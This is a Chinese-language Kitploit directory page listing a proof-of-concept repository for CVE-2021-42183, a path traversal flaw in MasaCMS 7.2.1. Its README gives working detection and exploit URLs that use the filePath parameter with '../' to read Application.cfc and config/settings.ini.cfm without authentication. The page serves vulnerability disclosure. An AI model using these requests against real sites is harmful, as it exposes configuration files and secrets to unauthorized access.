Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-42183 — 针对 MasaCMS 7.2.1 中通过 /index.cfm/_api/asset/image/ 的路径遍历的概念验证漏洞利用,允许未认证攻击者读取任意文件,如配置文件和 Application.cfc。 | Kitploit
工具/GitHubGitHub/0xraw/cve-2021-42183
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHub0xraw/cve-2021-42183

CVE-2021-42183

针对 MasaCMS 7.2.1 中通过 /index.cfm/_api/asset/image/ 的路径遍历的概念验证漏洞利用,允许未认证攻击者读取任意文件,如配置文件和 Application.cfc。

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-42183

MasaCMS 7.2.1 在 /index.cfm/_api/asset/image/ 中存在路径遍历漏洞。

Detection

root@kitploit:~
If this file is readable it means the vulnerablilty exists.
https://example.com/index.cfm/_api/asset/image/?filePath=/Application.cfc

Exploit

root@kitploit:~
https://example.com/index.cfm/_api/asset/image/?filePath=/../<Path>
- Read The Config File
https://example.com/index.cfm/_api/asset/image/?filePath=/../config/settings.ini.cfm 

Tested On

MasaCMS 7.2.1

Vendor

http://www.masacms.com

https://github.com/MasaCMS/MasaCMS https://github.com/MasaCMS/MasaCMS/blob/01e0636db0ea4c132906724e1b0772c86e263ada/core/mura/content/file/fileManager.cfc#L368

Discovered By:

Rawi And BassamAssiri.

下载工具